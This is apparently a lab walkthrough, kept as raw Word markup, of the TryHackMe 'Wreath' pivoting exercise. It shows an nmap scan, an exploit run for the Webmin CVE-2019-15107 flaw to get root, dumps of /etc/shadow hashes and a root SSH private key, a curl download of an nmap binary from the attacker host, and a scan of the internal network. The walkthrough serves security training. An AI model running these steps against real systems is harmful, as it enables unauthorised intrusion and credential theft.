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0AF6E" w14:textId="77777777" w:rsidR="00142778" w:rsidRPr="00142778" w:rsidRDefault="00142778" w:rsidP="0014277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  <w:r w:rsidRPr="00142778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Wreath - Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A6F1B8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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ENUM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0793E2C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F6EE7D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Scan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với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 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-A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sV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-T4 -p 1-15000 10.200.81.200 -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Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CC037BB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OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2526F5F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Starting Nmap 7.92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( https://nmap.org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) at 2022-06-08 00:04 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B720C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Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2672666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Connect Scan Timing: About 44.01% done; ETC: 00:07 (0:01:30 remaining)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCEBED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Stats: 0:01:12 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7C97B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Connect Scan Timing: About 45.17% done; ETC: 00:07 (0:01:27 remaining)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D4741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Nmap scan report for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thomaswreath.thm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(10.200.81.200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6676437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 (0.36s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6206ED3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Not shown: 14867 filtered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ports (no-response), 128 filtered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ports (host-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unreach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14:paraId="3EC65D2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PORT     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STATE  SERVICE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VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF0474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22/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open  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OpenSSH 8.0 (protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEC66A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|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ssh-hostkey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</w:p>
    <w:p w14:paraId="5E2A32E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   3072 9c:1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b:d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4:b4:05:4d:88:99:ce:09:1f:c1:15:6a:d4:7e (RSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EF06B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|   256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93:55:b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4:d9:8b:70:ae:8e:95:0d:c2:b6:d2:03:89:a4 (ECDSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E20CB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_  256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f0:61:5a:55:34:9b:b7:b8:3a:46:ca:7d:9f:dc:fa:12 (ED25519)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220EF86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80/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open   http       Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335CC0D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|_http-title: Did not follow redirect to https://thomaswreath.thm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085FCDA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|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E60702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443/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open  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/http   Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BC749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|_http-title: Thomas Wreath | Developer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD2BE6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| http-methods: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDFF3B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_  Potentially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risky methods: TRACE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995ECC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|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-cert: Subject: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commonName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=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thomaswreath.thm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organizationName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=Thomas Wreath Development/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stateOrProvinceName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=East Riding Yorkshire/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countryName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=GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A96FC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 Not valid before: 2022-06-08T03:59:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A31E4D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|_Not valid after:  2023-06-08T03:59:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17249A6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|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244C8F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-date: TLS randomness does not represent time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DDD01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|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tls-alpn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</w:p>
    <w:p w14:paraId="7F84FD0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_  http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/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEB433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9090/</w:t>
      </w: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closed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zeus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-admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7D863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10000/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open   http      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MiniServ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1.890 (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Webmin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httpd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1993D16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|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D4AD4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3808C00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Service detection performed. Please report any incorrect results at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https://nmap.org/submit/ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42BCC09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Nmap done: 1 IP address (1 host up) scanned in 182.50 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E34283B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>máy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 centos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F84A0F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Port 10k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 CVE-2019-15107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3DE721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AD8DA58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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXPLOIT WEB SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D3775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53858D5F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Tải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file exploit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cve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458D57BE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git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00142778">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/MuirlandOracle/CVE-2019-15107</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A6BF2E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sudo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apt install python3-pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51A04A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cd CVE-2019-15107 &amp;&amp; pip3 install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F2F1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chmod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+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 .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/CVE-2019-15107.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323D8681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7D5DC8D8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Khai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thác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11EEF956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./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CVE-2019-15107.py 10.200.81.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E01D41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0BCF054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Sau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chiếm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quyền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thành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thì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tiến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hành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tìm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kiếm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thêm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tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200962C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# </w:t>
      </w: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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="231E85A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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F9C44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# cat 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etc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/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB167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root: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x:0:0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:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C9515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bin: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x:1:1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:bin:/bin:/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6342FB8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daemon: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x:2:2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:daemon:/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1BB76FD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adm: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x:3:4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:adm:/var/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adm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674A34C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lp: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x:4:7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:lp:/var/spool/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lpd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24D71CB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sync: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x:5:0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:sync:/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:/bin/sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B76812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shutdown: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x:6:0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:shutdown:/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/shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C46D1F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halt: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x:7:0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:halt:/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/halt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F1241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mail: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x:8:12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:mail:/var/spool/mail:/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5501F41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operator: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x:11:0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:operator:/root:/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46FD4A7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games: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x:12:100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:games:/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usr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/games:/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7E1E1DE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ftp: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x:14:50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:FTP User:/var/ftp:/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646E17F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nobody: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x:65534:65534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:Kernel Overflow User:/:/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6E9AFC2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>dbus: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x:81:81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:System message bus:/:/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4AC7792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systemd-coredump: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x:999:997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:systemd Core Dumper:/:/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6180582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systemd-resolve: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x:193:193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:systemd Resolver:/:/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13C217A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tss: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x:59:59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:Account used by the trousers package to sandbox the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tcsd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daemon:/dev/null:/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1812FCF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polkitd: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x:998:996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:User for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polkitd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2B7FADF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libstoragemgmt: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x:997:995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:daemon account for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libstoragemgmt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:/var/run/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lsm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5C4241A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cockpit-ws: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x:996:993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:User for cockpit web service:/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nonexisting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74DCE0A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cockpit-wsinstance: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x:995:992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:User for cockpit-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ws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instances:/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nonexisting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58A4649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sssd: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x:994:990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:User for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sssd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35B354D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sshd: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x:74:74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:Privilege-separated SSH:/var/empty/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3BCB669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chrony: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x:993:989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::/var/lib/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chrony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052CAE6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rngd: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x:992:988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:Random Number Generator Daemon:/var/lib/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rngd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1E2BEB6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twreath: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x:1000:1000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:Thomas Wreath:/home/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twreath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:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F1BE0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unbound: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x:991:987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:Unbound DNS resolver:/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etc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/unbound:/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761411E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apache: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x:48:48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:Apache:/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usr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/share/httpd:/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7B005C7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nginx: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x:990:986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:Nginx web server:/var/lib/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nginx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57E8BB1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mysql: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x:27:27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:MySQL Server:/var/lib/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mysql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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="165F3F0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# cat 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etc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/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F027E5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root:$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd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3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1::0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB56DF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bin:*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3447F2C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daemon:*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4739543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adm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7D5FD9D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lp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613487C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sync:*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374A07E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shutdown:*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2E1E199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halt:*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53C956B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mail:*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6E1019D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operator:*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7ABC673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games:*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28D134B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ftp:*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7CDF910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nobody:*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:18358:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB261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dbus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378004F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systemd-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coredump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454B205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resolve:!!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6E2494A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tss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0C68A05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polkitd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24DC0E3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libstoragemgmt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291AEB7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cockpit-</w:t>
      </w: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ws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08C7FBA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cockpit-</w:t>
      </w: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wsinstance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7B0D7A0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sssd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4F0F21E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1294802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chrony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6604F47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rngd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6724529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>twreath:$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6$0my5n311RD7EiK3J$zVFV3WAPCm/dBxzz0a7uDwbQenLohKiunjlDonkqx1huhjmFYZe0RmCPsHmW3OnWYwf8RWPdXAdbtYpkJCReg.::0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7780B23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unbound:!!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1F418F2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apache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311E3E7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nginx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704F068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mysql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:!!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:18573::::::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BAB58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# cat /root/.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id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FD2A3F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-----BEGIN OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE9A6E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b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B4DA2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NhAAAAAwEAAQAAAYEAs0oHYlnFUHTlbuhePTNoITku4OBH8OxzRN8O3tMrpHqNH3LHaQRE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0921520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LgAe9qk9dvQA7pJb9V6vfLc+Vm6XLC1JY9Ljou89Cd4AcTJ9OruYZXTDnX0hW1vO5Do1bS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E556E5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jkDDIfoprO37/YkDKxPFqdIYW0UkzA60qzkMHy7n3kLhab7gkV65wHdIwI/v8+SKXlVeeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E76497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0+L12BkcSYzVyVUfE6dYxx3BwJSu8PIzLO/XUXXsOGuRRno0dG3XSFdbyiehGQlRIGEMzx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEBF4A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hdhWQRry2HlMe7A5dmW/4ag8o+NOhBqygPlrxFKdQMg6rLf8yoraW4mbY7rA7/TiWBi6jR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79156F8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fqFzgeL6W0hRAvvQzsPctAK+ZGyGYWXa4qR4VIEWnYnUHjAosPSLn+o8Q6qtNeZUMeVwzK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4664652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H9rjFG3tnjfZYvHO66dypaRAF4GfchQusibhJE+vlKnKNpZ3CtgQsdka6oOdu++c1M++Zj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A9F8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z14DJom9/CWDpvnSjRRVTU1Q7w/1MniSHZMjczIrAAAFiMfOUcXHzlHFAAAAB3NzaC1yc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2515F32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EAAAGBALNKB2JZxVB05W7oXj0zaCE5LuDgR/Dsc0TfDt7TK6R6jR9yx2kERC4AHvapPXb0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561CF59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AO6SW/Ver3y3PlZulywtSWPS46LvPQneAHEyfTq7mGV0w519IVtbzuQ6NW0o5AwyH6Kazt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3007132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+/2JAysTxanSGFtFJMwOtKs5DB8u595C4Wm+4JFeucB3SMCP7/Pkil5VXnoNPi9dgZHEmM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7587F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1clVHxOnWMcdwcCUrvDyMyzv11F17DhrkUZ6NHRt10hXW8onoRkJUSBhDM8YXYVkEa8th5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE0AA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THuwOXZlv+GoPKPjToQasoD5a8RSnUDIOqy3/MqK2luJm2O6wO/04lgYuo0X6hc4Hi+ltI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1BDFD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UQL70M7D3LQCvmRshmFl2uKkeFSBFp2J1B4wKLD0i5/qPEOqrTXmVDHlcMyh/a4xRt7Z43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446825C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2WLxzuuncqWkQBeBn3IULrIm4SRPr5SpyjaWdwrYELHZGuqDnbvvnNTPvmY89eAyaJvfwl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7D62B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g6b50o0UVU1NUO8P9TJ4kh2TI3MyKwAAAAMBAAEAAAGAcLPPcn617z6cXxyI6PXgtknI8y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740B4C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lpb8RjLV7+bQnXvFwhTCyNt7Er3rLKxAldDuKRl2a/kb3EmKRj9lcshmOtZ6fQ2sKC3yoD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3864669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oyS23e3A/b3pnZ1kE5bhtkv0+7qhqBz2D/Q6qSJi0zpaeXMIpWL0GGwRNZdOy2dv+4V9o4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC0E4C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8o0/g4JFR/xz6kBQ+UKnzGbjrduXRJUF9wjbePSDFPCL7AquJEwnd0hRfrHYtjEd0L8eeE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4915A76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egYl5S6LDvmDRM+mkCNvI499+evGwsgh641MlKkJwfV6/iOxBQnGyB9vhGVAKYXbIPjrbJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC3A65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r7Rg3UXvwQF1KYBcjaPh1o9fQoQlsNlcLLYTp1gJAzEXK5bC5jrMdrU85BY5UP+wEUYMbz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D0E02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TNY0be3g7bzoorxjmeM5ujvLkq7IhmpZ9nVXYDSD29+t2JU565CrV4M69qvA9L6ktyta51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7233E06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bA4Rr/l9f+dfnZMrKuOqpyrfXSSZwnKXz22PLBuXiTxvCRuZBbZAgmwqttph9lsKp5AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34BE0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>wBMyQsq6e7CHlzMFIeeG254QptEXOAJ6igQ4deCgGzTfwhDSm9j7bYczVi1P1+BLH1pDCQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A56D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viAX2kbC4VLQ9PNfiTX+L0vfzETRJbyREI649nuQr70u/9AedZMSuvXOReWlLcPSMR9Hn7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2791BF6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bA70kEokZcE9GvviEHL3Um6tMF9LflbjzNzgxxwXd5g1dil8DTBmWuSBuRTb8VPv14SbbW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D68E20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HHVCpSU0M82eSOy1tYy1RbOsh9hzg7hOCqc3gqB+sx8bNWOgAAAMEA1pMhxKkqJXXIRZV6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB514C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0w9EAU9a94dM/6srBObt3/7Rqkr9sbMOQ3IeSZp59KyHRbZQ1mBZYo+PKVKPE02DBM3yBZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB843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r2u7j326Y4IntQn3pB3nQQMt91jzbSd51sxitnqQQM8cR8le4UPNA0FN9JbssWGxpQKnnv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023B1A7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m9kI975gZ/vbG0PZ7WvIs2sUrKg++iBZQmYVs+bj5Tf0CyHO7EST414J2I54t9vlDerAcZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3073898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DZwEYbkM7/kXMgDKMIp2cdBMP+VypVAAAAwQDV5v0L5wWZPlzgd54vK8BfN5o5gIuhWOkB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6F8CE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2I2RDhVCoyyFH0T4Oqp1asVrpjwWpOd+0rVDT8I6rzS5/VJ8OOYuoQzumEME9rzNyBSiTw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617E809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YlXRN11U6IKYQMTQgXDcZxTx+KFp8WlHV9NE2g3tHwagVTgIzmNA7EPdENzuxsXFwFH9TY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1823E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EsDTnTZceDBI6uBFoTQ1nIMnoyAxOSUC+Rb1TBBSwns/r4AJuA/d+cSp5U0jbfoR0R/8by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3226493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GbJ7oAQ232an8AAAARcm9vdEB0bS1wcm9kLXNlcnYBAg==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D34C8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-----END OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A809A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user,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key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rồi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thì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server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thôi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53944CF8" w14:textId="534E52B9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id_wr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hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00B93BCC" w:rsidRPr="004A46BA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>root@10.200.84.200</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B599956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375C70E1" w14:textId="77777777" w:rsidR="00142778" w:rsidRPr="00142778" w:rsidRDefault="00142778" w:rsidP="0014277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  <w:r w:rsidRPr="00142778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 xml:space="preserve">Git </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00142778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enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70632C4C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Download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binary to your computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A7412B" w14:textId="77777777" w:rsidR="00142778" w:rsidRPr="00142778" w:rsidRDefault="000235DA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hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00142778" w:rsidRPr="00142778">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap?raw=true</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="567BD547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67B1E9A5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create server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5D4B84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python3 -m </w:t>
      </w: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http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2926C200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EED329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Access into target host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB9EA3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use curl to download file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A743B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curl 10.50.85.26/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o .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-dai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4029BCD9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C3E9A44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>Run scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0D67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./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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-dai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10.200.84.0/24 -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scan-dai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2320F3D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238548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 (-0.18s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06109B5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MAC Address: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02:F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3:70:5F:3A:E7 (Unknown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462309B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Nmap scan report for ip-10-200-84-100.eu-west-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1.compute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.internal (10.200.84.100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4939113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 (0.00019s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56535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MAC Address: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02:EF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:0B:41:F6:17 (Unknown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C8A4D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Nmap scan report for ip-10-200-84-150.eu-west-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1.compute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.internal (10.200.84.150)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2369DE8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 (0.00015s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8B6B0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MAC Address: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02:A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2:EE:BA:7D:4B (Unknown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129631B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Nmap scan report for ip-10-200-84-250.eu-west-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1.compute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.internal (10.200.84.250)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FE974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 (0.00022s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFDFEB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MAC Address: 02:9C:9D:AF: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36:F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5 (Unknown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E21ABB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Nmap scan report for ip-10-200-84-200.eu-west-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1.compute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.internal (10.200.84.200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5614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up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B31937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07F24E2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75AD5B4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./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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nmap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-dai 10.200.84.100,150 -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scan-dai1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169296B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0ACDD0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Nmap scan report for ip-10-200-84-150.eu-west-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1.compute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.internal (10.200.84.150)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A8E4C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Host is up (0.00051s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345DBB2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Not shown: 6147 filtered ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE2841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PORT     STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF3336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80/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open  http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="43082C0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3389/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open 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ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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wbt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-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8E873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5985/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open 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wsman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15E67EC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MAC Address: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02:A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2:EE:BA:7D:4B (Unknown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4699A54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0F66759B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68BA627E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PIVOTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51617BE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curl 10.200.84.150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DB17A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27260C4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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B1A74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&lt;html lang="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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6B446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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412D10B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&lt;meta http-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equiv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="content-type" content="text/html; charset=utf-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E6433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&lt;title&gt;Page not found at /&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AEA5C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&lt;meta name="robots" content="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NONE,NOARCHIVE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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A675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&lt;style type="text/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css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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFB0FE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html *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padding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:0; margin:0; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D091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body *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padding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:10px 20px; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5371EBA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    body * *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padding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:0; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546B3AA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body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{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font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:small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sans-serif; background:#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eee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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B67E6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body&gt;div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border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-bottom:1px solid #ddd; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641BE57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h1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{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font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-weight:normal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margin-bottom:.4em; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3E30D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h1 span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font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-size:60%; color:#666;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font-weight:normal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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E372B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table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{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border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:none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border-collapse: collapse; width:100%; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B446B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td,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{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vertical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-align:top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padding:2px 3px; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0AE1D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width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:12em;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text-align:right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color:#666; padding-right:.5em; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886770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#info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background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:#f6f6f6; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5992236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#info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margin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 0.5em 4em; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566640F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#info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li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font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-family: monospace; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD68C2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#summary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background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 #ffc; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CAD6B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#explanation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{ background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:#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eee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; border-bottom: 0px none; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609CB0B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&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7634C5E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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619841A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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291C43E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&lt;div id="summary"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C665F7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&lt;h1&gt;Page not found &lt;span&gt;(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404)&lt;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/span&gt;&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68606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&lt;table class="meta"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4547D81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&lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7038CCE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&lt;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&gt;Request Method:&lt;/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1AAE9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&lt;td&gt;GET&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A9831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&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3217033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&lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E22FC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&lt;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&gt;Request URL:&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4F382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&lt;td&gt;http://10.200.84.150/&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292B55F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&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8CC38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&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793729F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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545149C9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&lt;div id="info"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D887D4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083A33A2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&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB7B7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Using the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URLconf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defined in &lt;code&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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app.urls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&lt;/code&gt;,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1D0F46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Django tried these URL patterns, in this order:</w:t>
      </w:r>
    </w:p>
